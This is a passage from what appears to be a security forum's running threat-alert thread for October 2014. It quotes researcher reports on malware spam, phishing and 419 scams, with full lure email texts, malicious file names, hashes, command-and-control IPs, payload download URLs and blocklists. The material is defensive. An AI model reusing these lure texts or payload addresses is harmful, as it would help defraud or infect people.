* https://www.virustotal.com/en/file/ce97ddc450b4aefc33e279992c2a201297d74eb56ff98f8ed188fa2c0990485b/analysis/1412589518/
___

Fake Bank confirmation SPAM - PDF malware
- http://myonlinesecurity.co.uk/chen-young-bank-swift-fake-pdf-malware/
6 Oct 2014 - "'CHEN YOUNG BANK SWIFT' pretending to come from CHEN YOUNG is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Hello,
My bank have made the payment and the funds will arrive your bank in 3 days time. Attached is the bank confirmation Swift, let me know if your bank details are ok in the SWIFT
Thank you!
Chen Young
Branch Manager
YangZhou Wells Imp&Exp Co., Ltd
9-525 Modern Square,
Wenhui West Road
Yangzhou, Jiangsu. CHINA
Fax: 0086 514 8795 1721 / 0086 514 8795 1752

6 October 2014: SWIFT_0000019989399188321110000011.zip:
Extracts to: SWIFT_000001998939918835961163324799.exe
Current Virus total detections: 9/55* . This 'CHEN YOUNG BANK SWIFT' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/ff424a01fd1a1f3fd0bb50704d16cd8fe63f7d4136b2df4bf6b8924bace8c979/analysis/1412582411/
___

Fake Tiffany invoice SPAM – PDF malware
- http://myonlinesecurity.co.uk/tiffany-invoice-copy-waiting-confirmation-fake-pdf-malware/
6 Oct 2014 - "'invoice copy (waiting for your confirmation)' pretending to come from Tiffany & Co. <j.parker@ tiffany .co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Kindly open to see export License and payment invoice attached, meanwhile we sent the balance payment yesterday.
Please confirm if it has settled in your account or you can call if there is any problem.
Thanks J.parker
Tiffany & Co.

6 October 2014: Tiffany order details 06-10-2014.zip:
Extracts to: Tiffany order details 06-10-2014.exe
Current Virus total detections: 6/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/f1b13062f764e0e5643da3e74753d912d596cc362def9142263cea0e686bba80/analysis/1412597423/

:fear: :mad:

AplusWebMaster
2014-10-07, 15:35
FYI...

DHL phish ...
- http://blog.dynamoo.com/2014/10/dhl-themed-phish-goes-to-lot-of-effort.html
7 Oct 2014 - "This DHL-themed phish is trying to harvest email credentials, but instead of just spamming out a link, it spams out a PDF file with the link embedded in it.
Screenshot: https://3.bp.blogspot.com/-J8JkllU3g1M/VDOdr9sAc5I/AAAAAAAAFyQ/VE4P9MxOkGY/s1600/dhl.png

Look closely at the blurb at the bottom and it confuses DHL with UPS, but who reads that? Attached is a non-malicious PDF file DHL (1).pdf which contains a link to the phishing site.
Screenshot2: https://2.bp.blogspot.com/-smrDiPpKzJY/VDOeWRTX8uI/AAAAAAAAFyY/oucaylYyHdQ/s1600/dhl2.png

... a neat trick to use PDF files in this way as a lot of spam filters and anti-phishing tools won't spot it. The link in the PDF goes to 37.61.235.199 /~zantest/doc1/dhlweb0002/webshipping_dhl_com_members_modulekey_displaycountrylist_id5482210003804452/DHL/index .htm where it has a rather less professional looking webpage that is phishing for general email addresses rather than DHL credentials.
Screenshot3: https://4.bp.blogspot.com/-BDpUiMlKaEk/VDOfv4G-CmI/AAAAAAAAFyk/sS4m_BsPR1I/s1600/dhl3.png

With the grotty graphics and injudicious use of Comic Sans, it's hard to see how this would fool anyone into turning over their credentials.. but presumably they manage to harvest enough usernames and passwords to make it worthwhile."

37.61.235.199: https://www.virustotal.com/en/ip-address/37.61.235.199/information/
___

Fake Outlook voice mail SPAM – wav malware
- http://myonlinesecurity.co.uk/microsoft-outlook-received-voice-mail-fake-wav-malware/
7 Oct 2014 - "'You have received a voice mail' pretending to come from Microsoft Outlook <no-reply@ random domain address > is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You received a voice mail : VOICE0003589463733.wav
Caller-Id: 3589463733
Message-Id: ZU1I9W
Email-Id: montag @ myonlinesecurity .co .uk
This e-mail contains a voice message.
Download and extract the attachment to listen the message.
Sent by Microsoft Exchange Server

7 October 2014: VOICE3589463733.wav.zip: Extracts to: VOICE000358276655116307.exe
Current Virus total detections: 10/55* . This You have received a voice mail is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav ( sound ) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected...*
* https://www.virustotal.com/en/file/fb286c8c0c1bbf7c89be27016a7fce614515fa47e1e5219618b15ead6d0cf544/analysis/1412673429/
___

Vishing ...
- https://blog.malwarebytes.org/fraud-scam/2014/10/here-vishy-vishy/
Oct 7, 2014 - "Voice phishing – Vishing, for short – has been around for a long time and is all about using the phone and social engineering to grab the information required...
Ref: http://www.edinburghnews.scotsman.com/news/crime/vishing-scammers-con-woman-out-of-80-000-1-3540027
...
- http://www.telegraph.co.uk/finance/personalfinance/bank-accounts/10882193/I-lost-17500-in-vishing-scam-because-I-didnt-watch-The-One-Show.html
Vishing can start with an email or a text but the ultimate goal is to get you on the other end of a telephone line. From there, the -scammers- will go about harvesting your data by pretending to be your bank and asking for card... It’s important to remember there are many ways to fall foul of a telephone scam than “just” Vishing, and you can take a look at some more examples in a roundup by the FTC*..."
* http://www.consumer.ftc.gov/articles/0076-phone-scams
___

419 SCAM - Breast Cancer Awareness Donation
- http://myonlinesecurity.co.uk/ongoing-breast-cancer-awareness-donation-program-419-scam/
7 Oct 2014 - "This rather evil and nasty 419 scam saying Ongoing Breast Cancer Awareness Donation Program pretends to come from Neil trotter Cancer Foundation <neil–trotter@ [redacted] .com>... The email looks like this with pictures:

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/Ongoing-Breast-Cancer-Awareness-Donation-Program.png

Obviously it is a total -scam- and you should -not- reply to any email received that is like this."
___

Fake inTuit/Apple malicious SPAM
- https://security.intuit.com/alert.php?a=111
Oct 7, 2014 - "People are receiving fake emails with the title 'Your receipt No.557911643385'. These mails are coming from applecenter@ security .intuit .com, which is -not- a legitimate email address (spoofed). Below is a copy of the email people are receiving:

Apple iTunes
October 07, 2014
Billed To:
Order ID: KT85GMQ55L
Receipt Date: 10/07/2014
Order Total: $161.98
Billed To: Store Credit
Item Artist
August: Osage County John Wells
My Man Is a Loser Mike Young
Type Unit Price
Film Rental(HD) $67.99
Film Rental(HD) $93.99
Order Total
$161.98
Issues with this transaction?
If you haven't authorized this transaction, click the link below to get full refund...
2014 Apple Online Support

This is the end of the -fake- email.
Steps to Take Now:
- Do not open the attachment in the email.
- Do not -click- on any -links- in the email..
- Delete the email.
___

Yahoo Sports servers - malicious code
- http://www.theinquirer.net/inquirer/news/2374191/yahoo-shellshock-not-to-blame-for-server-security-flaw
Oct 7 2014 - "... there was some kind of security breach on its servers, but took pains to clear up reports which suggested that Shellshock was the reason. Yahoo's chief information security officer, Alex Stamos, took to the net to counter comments that began at Yahoo*..."
* https://news.ycombinator.com/item?id=8418809
Oct 6 2014 - "... I’m the CISO of Yahoo and I wanted to clear up some misconceptions. Earlier today, we reported that we isolated a handful of servers that were detected to have been impacted by a security flaw. After investigating the situation fully, it turns out that the servers were in fact -not- affected by Shellshock. Three of our Sports API servers had malicious code executed on them this weekend by attackers looking for vulnerable Shellshock servers. These attackers had mutated their exploit, likely with the goal of bypassing IDS/IDP or WAF filters. This mutation happened to exactly fit a command injection bug in a monitoring script our Sports team was using at that moment to parse and debug their web logs. Regardless of the cause our course of action remained the same: to isolate the servers at risk and protect our users' data. The affected API servers are used to provide live game streaming data to our Sports front-end and do not store user data. At this time we have found -no- evidence that the attackers compromised any other machines or that any user data was affected. This flaw was specific to a small number of machines and has been -fixed- and we have added this pattern to our CI/CD code scanners to catch future issues... the servers in question had been successfully patched (twice!!) immediately after the Bash issue became public. Once we ensured that the impacted servers were isolated from the network, we conducted a comprehensive trace of the attack code through our entire stack which revealed the root cause: -not- Shellshock... just because exploit code works doesn’t mean it triggered the bug you expected!... Yahoo takes external security reports seriously and we strive to respond immediately to credible tips... our records show no attempt by this researcher to contact us using those means. Within an hour of our CEO being emailed directly we had isolated these systems and begun our investigation..."
___

Adobe - spying on e-book readers
- http://www.theinquirer.net/inquirer/news/2374349/adobe-accused-of-spying-on-e-book-readers
Oct 7 2014

- http://arstechnica.com/security/2014/10/adobes-e-book-reader-sends-your-reading-logs-back-to-adobe-in-plain-text/
Oct 7 2014

- http://the-digital-reader.com/2014/10/06/adobe-spying-users-collecting-data-ebook-libraries/

:mad: :fear:

AplusWebMaster
2014-10-08, 14:45
FYI...

Fake Business proposal - Phish ...
- https://blog.malwarebytes.org/fraud-scam/2014/10/dear-important-business-proposal/
Oct 8, 2014 - "Carter Ham, a retired four-star United States Army general, is supposedly on Linkedin—and he wants you (to read his personal message)... clearly a scheme to phish for information from unwary recipients. Below is a screenshot of the sender’s online profile:
General Carter Ham on Linkedin. Not!:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/linkedin-gch.png
... As far as the legitimacy of the profile goes, the blurb from the Summary section was copied and pasted from this Wikipedia page*. We don’t know if the former general is indeed on the said social networking site (in case you’re wondering). What we -do- know is that if you receive a message similar to the one above asking for personal information from you in exchange for a slice of the cash s/he wanted to move, it’s best to ignore the message and check with this contact if his/her account has been hacked or not."
* http://en.wikipedia.org/wiki/Carter_Ham
___

Fake Lloyds and NatWest SPAM - malware
- http://blog.dynamoo.com/2014/10/malware-spam-lloyds-important.html
8 Oct 2014 - "... familiar pattern to this malware-laden spam, but with an updated payload from before:
Lloyds Commercial Bank: "Important - Commercial Documents"
From: Lloyds Commercial Bank [secure@ lloydsbank .com]
Date: 8 October 2014 11:09
Subject: Important - Commercial Documents
Important account documents
Reference: C437
Case number: 66324010
Please review BACs documents.
Click link below, download and open document. (PDF Adobe file) ...

From: NatWest [secure.message@ natwest .com]
Date: 8 October 2014 10:29
Subject: You have a new Secure Message - file-2620
You have received a encrypted message from NatWest Customer Support
In order to view the attachment please open it using your email client ( Microsoft Outlook, Mozilla Thunderbird, Lotus )
Please download your ecnrypted message at ...
(Google Disk Drive is a file hosting service operated by Google, Inc.) ...

The link in the email runs through a script which will attempt to download a ZIP file pdf-to-view_864129_pdf.zip onto the target machine which in turn contains a malicious executable pdf-to-view_864129_pdf.exe which has a VirusTotal detection rate of 6/53*. The Malwr report indicates that the malware phones home to the following locations which are worth -blocking- especially 94.75.233.13 (Leaseweb, Netherlands) which looks like a C&C server."
94.75.233.13 :37400/0810uk1/HOME/0/51-SP3/0/
94.75.233.13 :37400/0810uk1/HOME/1/0/0/
94.75.233.13 :37400/0810uk1/HOME/41/5/1/
cemotrans .com/seo/0810uk1.soa
* https://www.virustotal.com/en/file/3c04500e3adf84f62f6428f5d739d5f877e81071bcdfff9d186f120533ffe0df/analysis/1412773720/
... Behavioural information
DNS requests
cemotrans .com (82.98.157.8)
TCP connections
94.75.233.13: https://www.virustotal.com/en/ip-address/94.75.233.13/information/
82.98.157.8: https://www.virustotal.com/en/ip-address/82.98.157.8/information/
___

Fake photo SPAM – malware
- http://myonlinesecurity.co.uk/photo-8-oct-2014-malware/
8 Oct 2014 - "'photo 8 oct 2014' pretending to come from various @yahoo.co.uk addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email is very plain and terse with the subject of photo 8 oct 2014 and the body simply says:

Sent from my iPhone

8 October 2014: Img-0034.zip: Extracts to: Img-0034.jpeg
Current Virus total detections: 2/54* . Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email. Whether it is a message saying “look at this picture of me I took last night” and it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day..."
* https://www.virustotal.com/en/file/272804c706382e8a994bce09d36f0d620ba97dde68c2b590f26d442f984ce773/analysis/1412768396/
___

Fake Invoice Balance SPAM - word doc malware
- http://myonlinesecurity.co.uk/invoice-balance-fake-word-doc-malware/
8 Oct 2014 - "'Invoice Balance' pretending to come from various Hotmail .co.uk addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
HELLO,
work-life balance.
Thanks
---

8 October 2014: Invoice_Balance_september_doc.zip: Extracts to: Invoice_Balance_september_doc.exe
Current Virus total detections: 2/53* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/272804c706382e8a994bce09d36f0d620ba97dde68c2b590f26d442f984ce773/analysis/1412766448/
___

Australian Taxation Office Refund Spam
- http://threattrack.tumblr.com/post/99483080723/australian-taxation-office-refund-spam
Oct 8, 2014 - "Subjects Seen:
Australian Taxation Office - Refund Notification
Typical e-mail details:
IMPORTANT NOTIFICATION
Australian Taxation Office - 08/10/2014
After the last calculation of your fiscal activity we have determined that you are eligible to receive a refund of 2398.43 AUD.
For more details please follow the steps bellow :
- Right-click the link on the attachment name, and select Save Link As, Save Target As or a similar option provided.
- Select the location into which you want to download the file and choose Save.
- Unzip the attached file.
Ingrid Warren,
Tax Refund Department
Australian Taxation Office

Malicious File Name and MD5:
ATO_TAX_419771083.zip (EBE4991F3C1C4B00E3E8662577139F3E)
ATO_TAX_419771083.pdf.scr (A89CD5ACAB413D308A565B21B481A2F8)

Tagged: australian taxation office, Upatre, ATO

:fear: :mad:

AplusWebMaster
2014-10-09, 13:18
FYI...

Nuclear EK active on 178.79.182.106
- http://blog.dynamoo.com/2014/10/nuclear-ek-active-on-17879182106.html
9 Oct 2014 - "It looks like the Nuclear exploit kit is active on 178.79.182.106 (Linode, UK), using hijacked subdomains of legitimate domains using AFRAID.ORG nameservers. I can see the following sites active on that IP:
fuhloizle .tryzub-it .co.uk
fuhloizle .pgaof39 .com
fuhloizle .cusssa .org
"fuhloizle" is a pretty distinctive search string to look for in your logs. It looks like the bad sites might be down at the moment (or the kit is hardened against analysis), but blocking this IP address as a precaution might be a good idea."
178.79.182.106: https://www.virustotal.com/en/ip-address/178.79.182.106/information/
___

chinaregistry .org.cn domain SCAM
- http://blog.dynamoo.com/2014/10/chinaregistryorgcn-domain-scam.html
9 Oct 2014 - "This is an old scam that can safely be ignored.
From: Henry Liu [henry.liu@ chinaregistry .org.cn]
Date: 9 October 2014 07:53
Subject: [redacted] domain and keyword in CN
(Please forward this to your CEO, because this is urgent. Thanks)
We are a Network Service Company which is the domain name registration center in Shanghai, China. On Oct 7, 2014, we received an application from Huaya Holdings Ltd requested "[redacted]" as their internet keyword and China (CN) domain names. But after checking it, we find this name conflict with your company name or trademark. In order to deal with this matter better, it's necessary to send email to you and confirm whether this company is your distributor or business partner in China?Kind regards
Henry Liu
General Manager
China Registry (Headquarters)
3002, Nanhai Building, No. 854 Nandan Road,
Xuhui District, Shanghai, China ...

Nobody is trying to register your domain name, this is simply a long-running scam aimed at getting you to spend too much money on something that you don't need. And I strongly recommend that you don't forward junk email like this to your CEO either..."
(Short video at the dynamoo URL above.)
___

Bash Bug saga continues: Shellshock Exploit via DHCP
- http://blog.trendmicro.com/trendlabs-security-intelligence/bash-bug-saga-continues-shellshock-exploit-via-dhcp/
Oct 8, 2014 - "The Bash vulnerability known as Shellshock can be exploited via several attack surfaces including web applications, DHCP, SIP, and SMTP. With multiple proofs of concept (including -Metasploit- code) available in the public domain, this vulnerability is being heavily exploited. Most discussion of Shellshock attacks have focused on attacks on web apps. There has been relatively little discussion on on other surfaces like DHCP, SMTP, and CUPS... techniques could be used by an attacker to compromise more machines within the network. Dynamic Host Configuration Protocol (DHCP) is a protocol used to dynamically distribute and assign network configuration settings, such as IP addresses. An attacker can configure a compromised DHCP server or create a rogue DHCP server to send -malicious- information to the DHCP client. Either technique means that the attacker has already compromised the network using other attack vectors... Various techniques can be used to to exploit Shellshock over DHCP..."
(More detail at the trendmicro URL above.)

:mad: :fear:

AplusWebMaster
2014-10-10, 16:43
FYI...

Fake fax, 'Secure msg' SPAM - malware
- http://blog.dynamoo.com/2014/10/malware-spam-youve-received-new-fax-you.html
10 Oct 2014 - "A pair of malware spams this morning, both with the same payload:

"You've received a new fax"
From: Fax [fax@ victimdomain .com]
Date: 10 October 2014 11:34
Subject: You've received a new fax
New fax at SCAN7097324 from EPSON by https ://victimdomain .com
Scan date: Fri, 10 Oct 2014 18:34:56 +0800
Number of pages: 2
Resolution: 400x400 DPI
You can secure download your fax message at ...
(Google Disk Drive is a file hosting service operated by Google, Inc.)

"You have received a new secure message from BankLine"
From: Bankline [secure.message@ bankline .com]
Date: 10 October 2014 10:29
Subject: You have received a new secure message from BankLine
You have received a secure message.
Read your secure message by following the link ...
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it...

The malware downloads a file document_73128_91898_pdf.zip from the target site that contains a malicious executable document_73128_91898_pdf.exe which has a VirusTotal detection rate of 4/54*. According to the ThreatExpert report... the malware communicates with the following URLs which are probably worth -blocking- or monitoring"
94.75.233.13 /1010uk1/NODE01/41/5/1/
94.75.233.13 /private/sandbox_status.php
94.75.233.13 /1010uk1/NODE01/0/51-SP3/0/
94.75.233.13 /1010uk1/NODE01/1/0/0/
beanztech .com/beanz/1010uk1.rtf
* https://www.virustotal.com/en/file/5c3643b5cf2c5a392a55589e5025bfe659149a0b5da662ad8989f25005ba28cc/analysis/1412937674/

94.75.233.13: https://www.virustotal.com/en/ip-address/94.75.233.13/information/
___

Gameover Zeus... at Vogue .com
- http://www.threattracksecurity.com/it-blog/gameover-zeus-accessorizes-vogue-com/
Oct 10, 2014 - "Our researchers this week spotted a Gameover Zeus sample receiving commands to download Zemot from hxxp ://media .vogue[dot]com/voguepedia/extensions/dimage/cache/1zX67.exe
... Others have spotted Gameover Zeus reaching out to a compromised vogue.com domain to download Zemot – a family of Trojan downloaders – which according to Microsoft is usually distributed via the Kuluoz botnet*. Behavior worth noting in this Gameover Zeus sample upon execution is that it crawled a list of DGA domains... this Gameover Zeus sample seems to be an updated variant targeting -financial- processes we’ve not yet seen in previous reports... According to URLquery.net**, there were several malicious files being served on the Vogue domain, which have been removed. 1zX67.exe was an active threat as late as yesterday evening..."
* http://blogs.technet.com/b/mmpc/archive/2014/09/09/msrt-september-2014-zemot.aspx

** http://www.urlquery.net/report.php?id=1412718766058
___

Mobile ads use malware tricks to get installs
- https://blog.malwarebytes.org/mobile-2/2014/10/mobile-advertisers-use-malware-tricks-to-get-installs/
Oct 10, 2014 - "Deceptive advertising targeting Android users is an effective way of getting malware installed. Now some advertisers are using it to get paid through pay-per-install schemes... we’ve been seeing more and more of this, but this time advertisers are using these banner and pop-up ads to get installs of more trustworthy apps like Dolphin browser. The messages are less scary than the virus related ones, but they are still meant to get your attention. It seems a bit backwards but it’s all about making money, ad developers are just as greedy as malware authors–just not as malicious. Anytime during your mobile browsing experience, if you encounter one of these pop-ups or similar just ignore and it’d probably be best to -leave- the site displaying them:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/and_ads06.jpg?w=564
...
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/and_ads05.jpg?w=564
Don’t fall for these messages, Android won’t use web pop-ups to inform you of updates, they’ll be handled through a system notification and apps will update via Google Play Services. Using a tool like Adblock Plus which will filter URL traffic can help prevent most of these ads. Adblock Plus is a third-party app, will require a bit of configuration* and only blocks WiFi traffic.
* https://adblockplus.org/en/android-config
...
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/and_ad11.jpg
On iOS you won’t see the warning pop-ups, instead you’ll immediately be -redirected- to the peddled apps App Store page. If, by chance, you’re interested in installing one of these apps go -directly- to your trusted source for apps. By following the redirect you might be going down another rabbit hole and end up getting -malware- instead of the original."
___

October 2014 Web Server Survey
- http://news.netcraft.com/archives/2014/10/10/october-2014-web-server-survey.html
10 Oct 2014 - "In the October 2014 survey we received responses from 1,028,932,208 sites, which is nearly six million more than last month. Microsoft lost the lead to Apache this month, as the two giants continue to battle closely for the largest share of all websites. Apache gained nearly 30 million sites, while Microsoft lost 22 million, causing Apache to be thrust back into the lead by more than 36 million sites. In total, 385 million sites are now powered by Apache, giving it a 37.45% share of the market. A significant contributor to this change was the expiry of domains previously used for link farming on Microsoft IIS servers. The domains used by these link farms were acquired and the sites are now hosted on Apache servers..."
(Charts available at the URL above.)

:fear: :mad:

AplusWebMaster
2014-10-13, 12:31
FYI...

Fake Amazon SPAM - Word doc malware
- http://myonlinesecurity.co.uk/amazon-co-uk-order-word-doc-malware/
13 Oct 2014 - "'Your Amazon.co.uk order #} random letters and numbers' pretending to come from AMAZON .CO.UK <order@ amazon .co.uk> and all being sent to 1122@ eddfg .com with a bcc to your email address is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/amazon_order_Oct.png

13 October 2014 : 575-3010892-0992746.doc Current Virus total detections: 0/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is -NEVER- open any attachment to an email, unless you are expecting it... The best way is to just delete the unexpected zip and not risk any infection."
* https://www.virustotal.com/en/file/3bbcdea4e4f6427296f8b57a77ee70967b9a91a703d69306296c78e1e92fe318/analysis/1413181748/

- http://blog.dynamoo.com/2014/10/your-amazoncouk-order-spam-with.html
13 Oct 2014
___

Fake BankLine SPAM - malware
- http://blog.dynamoo.com/2014/10/malware-spam-you-have-received-new.html
13 Oct 2014 - "A couple of unimaginative spam emails leading to a malicious payload.

You have received a new secure message from BankLine
From: Bankline [secure.message@ bankline .com]
Date: 13 October 2014 12:48
Subject: You have received a new secure message from BankLine
You have received a secure message.
Read your secure message by following the link ...
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it...

You've received a new fax
From: Fax [fax@ victimdomain .com]
Date: 13 October 2014 13:07
Subject: You've received a new fax
New fax at SCAN2166561 from EPSON by https ://victimdomain .com
Scan date: Mon, 13 Oct 2014 20:07:31 +0800
Number of pages: 2
Resolution: 400x400 DPI
(Dropbox Drive is a file hosting service operated by Google, Inc.)

Clicking the link downloads document_312_872_pdf.zip from the target site which in turn contains a malicious executable document_312_872_pdf.exe which has a VirusTotal detection rate of 3/54*... Also dropped are a couple of executables, egdil.exe (VT 2/54**, Malwr report) and twoko.exe (VT 6/55***, Malwr report).
Recommended blocklist:
94.75.233.13
144.76.220.116
85.25.152.238
carcomputer .co.uk
phyccess .com
hotelnuovo .com
wirelesssolutionsny .com
isc-libya .com "
* https://www.virustotal.com/en/file/a598ddc9af8438ac29a43a33c8dae09a996d77a5ae10331d7a02ea1df1e0d339/analysis/1413208781/

** https://www.virustotal.com/en/file/35274a3ffbe34b8b17ccdc147cd721c5748d39c6a143b0e4b67812767a4d197b/analysis/1413210259/

*** https://www.virustotal.com/en/file/e464613eaa2aec9fee27a4e3bb91219ca2c5cb38a41217604d6cde292f416445/analysis/1413210280/
___

Barclaycard phishing ...
- http://myonlinesecurity.co.uk/barclaycard-phishing-attempts/
13 Oct 2014 - "We are seeing quite a few Barclaycard phishing attempts today trying to get your Barclaycard details. These are not very well crafted and look nothing like any genuine Barclaycard emails. Do -not- click any links in these emails. Hover your mouse over the links and you will see a web address that isn’t Barclaycard. Immediately delete the email and the safest way to make sure that it isn’t a genuine email from Barclaycard is to type the Barclaycard web address in your browser. and then log in to the account that way...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/barclaycard_phishing-email.png

... using what look like they are hijacked/compromised subdomains of a real website. All of them use a random subdomain and then the website name and then /clients/? The site looks like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/barclaycard_phishing-site.png
Following the link in this Barclaycard or other spoofed emails takes you to a website that looks exactly like the real Barclaycard site. You are then through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your Barclaycard account, but also your Bank Account, and potentially your email details and webspace (if you have it). They want enough information to completely impersonate you and your identity not only in cyberspace but in real life..."
___

Fake Bank application SPAM - malware
- http://www.hoax-slayer.com/fnbo-account-application-malware-email.shtml
Oct 13 2014 - "Email purporting to be from First National Bank of Omaha (FNBO) claims that your account application has been received and invites you to open an -attached- file to view documents about your application:
Re: Applicant #9908541042
Hello,
Your application for an FNBO Direct account has been received. As an FNBO Direct customer, not only will you receive an exceptional interest rate, you can be confident your accounts are held by a bank established in values of trust, integrity, and security.
Please find in the attached document information concerning your application.
Copyright (c) 2014 FNBO Direct, a division of First National Bank of Omaha. All Rights Reserved. Deposit Accounts are offered by First National Bank of Omaha,
Member FDIC. Deposits are insured to the maximum permitted by law.
P.O. Box 3707, Omaha, NE 68103-0707
For information on FNBO Direct's privacy policy, please visit [Link removed]
Email ID: A0963.6
(Email included attached file with the name: 'FNBO_Direct_application_9908541042.zip')

According to this email, which claims to be from First National Bank of Omaha (FNBO), your application for an FNBO Direct account has been received. The message advises that information about your application is contained in an -attached- document... it masquerades as a seemingly legitimate business message and uses the name of a real company... the attached .zip file... contains a .exe file. Clicking the .exe file would install a trojan on your computer... do -not- open any attachments or click any links that it contains. You can report fraudulent FNBO emails via the reporting address on the bank's website*."
* https://www.fnbodirect.com/site/security-center/email-fraud.fhtml
___

Fake FedEx SPAM
- http://blog.mxlab.eu/2014/10/12/fake-email-your-payment-invoice-slip-from-fedex-contains-trojan/
Oct 12, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Your Payment Invoice Slip”. This email is send from the -spoofed- address “info@ ukboxingstore .co.uk” and has the following body:
Dear customer.
A parcel was sent to your home address.
And it will arrive within 3 business day.
More information and the tracking number are attached in the document.
Please do not respond to this message. This email was sent from an unattended mailbox.
This report was generated at approximately GMT on 06/10/2014.
To learn more about FedEx Express, please visit our website at fedex.com.
All weights are estimated.
To track the latest status of your shipment, View on the tracking number on the attached document
This tracking update has been sent to you by FedEx on the behalf of the Request or noted above.
FedEx does not validate the authenticity of the requestor and does not validate,
guarantee or warrant the authenticity of the request, the requestor’s message, or the accuracy of this tracking update...
Thank you for your business.
FedEx Customer Service

The attached ZIP file has the name FEDEX SHIPPING NOTIFICATION (1).zip and contains the 396 kB large file XXXX.exe. The trojan is known as TR/Dropper.Gen8, a variant of Win32/Injector.BNJA, HB_Ispi or Win32:Malware-gen. At the time of writing, 5 of the 55 AV engines did detect the trojan at VirusTotal*..."
* https://www.virustotal.com/en/file/7ffd0d31de67f7ece1bf472959078fda55a8091b9487e55c9a3579d8f55a68b1/analysis/1413096741/

:mad: :fear:

AplusWebMaster
2014-10-14, 16:14
FYI...

Fake DOC attachment SPAM - malware
- http://blog.dynamoo.com/2014/10/to-view-your-document-please-open.html
14 Oct 2014 - "This spam comes with a malicious DOC attachment:

From: Anna [ºžô õö?ǯ#-øß {qYrÝsØ l½:ž±þ EiÉ91¤É¤y$e| p‹äŒís' ÀQtÃ#7 þ–¿åoù[þ–¿åoù[þ–¿åoù[þ–¿åÿ7 å{˜x|%S;ÖUñpbSË‘ý§B§i…¾«¿¨` Òf ¶ò [no-reply@ bostonqatar .net]
Date: 14 October 2014 11:09
Subject: Your document
To view your document, please open attachment.

The "From" field in the samples I have seen seems to be a random collection of characters. The DOC attachment is also randomly named in the format document_9639245.doc. This word document contains a malicious macro [pastebin] which downloads an additional component from pro-pose-photography .co.uk/fair/1.exe. The DOC file has a VirusTotal detection rate of 0/55* and the EXE file is just 2/54** ... UPDATE: among other things the malware drops the executable pefe.exe with a detection rate of 3/55***..."
* https://www.virustotal.com/en-gb/file/38e14668c5676fd53234abc8128ba16b2f5b19ccadaa6dda75c3a2bf9480d285/analysis/1413281775/

** https://www.virustotal.com/en-gb/file/9f202cf5e15101c5a7e05280ad4dc86092b4036dcbbd8dd144e58c4115638e75/analysis/1413283670/

*** https://www.virustotal.com/en-gb/file/c9ae7f694229861dd05492bd532980f2504c3bc3ce58fd6fad71c44cb053d643/analysis/1413287366/

- http://myonlinesecurity.co.uk/document-word-doc-malware/
14 Oct 2014 - "... The email is very plain, simple and terse and just says:

To view your document, please open attachment.

14 October 2014: document_1720781.doc Current Virus total detections: 0/55* ..."
* https://www.virustotal.com/en/file/38e14668c5676fd53234abc8128ba16b2f5b19ccadaa6dda75c3a2bf9480d285/analysis/1413281933/
___

Fake Sales Order SPAM - word doc malware
- http://myonlinesecurity.co.uk/sales-order-number-son1410-000183-fake-word-doc-malware/
14 Oct 2014 - "'Sales Order Number SON1410-000183' pretending to come from mail@ firwood .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
<html>
<body bgcolor=”#FFFFFF”>
<table width=”750″ border=”0″>
<tr>
<td>
<font face=”verdana” size=”2″></font>
<br><br>
<font face=”verdana” size=”2″>Please find the attached document a summary
of which is below:</font>
</td>
</tr>
</table>
<table width=”750″ border=”0″> ...
</table>
<font face=”verdana” size=”2″>Regards </br></br><B>Firwood Paints Ltd
</B></br>Oakenbottom Road </br>Bolton BL2 6DP England </br></br>Tel +44
(0)1204 525231 </br>Fax +44 (0)1204 362522 </br>e mail mail@ firwood .co.uk
</br></font>
</body>
</html>
Automated mail message produced by DbMail.
Registered to X3 – Sage North America, License EDM2013051.
This message has been scanned for viruses by BlackSpider MailControl ...

14 October 2014: Extracts to: SON141000-000183.pdf.exe
